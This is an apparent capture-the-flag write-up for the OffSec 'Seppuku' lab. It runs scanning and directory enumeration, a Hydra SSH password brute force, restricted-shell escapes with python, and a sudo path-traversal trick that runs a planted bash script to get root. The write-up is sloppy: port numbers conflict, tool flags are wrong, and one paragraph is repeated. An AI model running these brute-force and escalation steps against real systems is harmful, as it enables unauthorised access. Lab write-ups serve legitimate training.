Seppuku | OffSec Writeup

Network scanning

We used Nmap for port scanning.

nmap  -A -sC -sV <your IP>        

We used Nmap for port enumeration and discovered the following open ports: port 21 for FTP, port 22 for SSH, port 80 for HTTP, ports 139 and 445 for NetBIOS-SSH, port 7080 for SSL/HTTP, port 7601 for HTTP, and port 8088 for HTTP.

Then visited hhtp://192.168.217.90:8088

Then I ran gobuster and found many hidden directories and used all of them but did not find anything. Then I ran gobuster on port 7061 and found many important directories such as secret key, keys, production

gobuster dir -u https://IP:7061 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt        

When we navigated the URL enumerated above, i.e. keys we found some files, here private was useful for us.

https://IP:7601/keys

This link leads us to a page called private. This is a private key for some users which we have not found yet.

Further, we will explore the 'secret' directory that we discovered during our Gobuster scan.

https://IP:7601/secret

As a result, it gives some very important files such as password.lst and hostname

Here found a file named hostname which gave us a username i.e. seppuku.

I went into all the folders one by one and found a hostname.

open passwd.bk

After downloading passwd.bk and opening it, I found a password.lst file. I copied and saved it on my Linux system to further brute-force the password.

nano passwordlisst.txt        

Exploiting

We have obtained the username 'seppuku'. Our next task is to find the password for the user 'seppuku' using Hydra for SSH login brute force.

hydra -l seppuku -p passwordlisst.txt 192.168.217.90 ssh        

From its result, we found the password eeyoree for seppuku.

We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.

ssh seppuku@192.168.217.90        

After logging in as tanto, we searched for the .cgi_bin directory, which would be executed through the sudo user. Unfortunately, we couldn't find this directory, so we created a directory named .cgi_bin and saved the bash script in a file named "bin" to obtain a bash shell through it

ls 
cat  locat.txt 
cd /home        

I noticed that the cd command is not working. Then I ran this command

python3 -c  'import  pty; pty.spawn("/bin/bash")'
cd /home         

Then work cd command:

cd /home

ls

I found here there are many users like tanto, samurai, seppuku.

ls -la         

After logging in, let's proceed with further investigation to find hidden files. We discovered a hidden file called .passwd, which provided us with a password, though its purpose is currently unknown.

Here I found a password.

I tried to do tanto login ssh. But I didn't succeed. Then I remembered that I had found a private file which had rsa key.

again we see rbash restrict error again we bypass the rbash shell our previous python command for checking privilege escalation we run the sudo -l command and here we found script entry without the password .

python -c 'import os; os.system("/bin/bash");'
sudo -l        

I logged in SSH with samurai user.

Privilege Escalation

Now that we have read-write permissions in the user's home directory, we first create a .cgi_bin directory. Then, we move to the cgi directory and use the cat command to create a simple bash file, adding full permissions for everyone to read, write, and execute the file.

After logging in as tanto, we searched for the .cgi_bin directory, which would be executed through the sudo user. Unfortunately, we couldn't find this directory, so we created a directory named .cgi_bin and saved the bash script in a file named "bin" to obtain a bash shell through it.

mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -la        

Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag.

sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cd /root
ls
cat proof.txt        

Root flag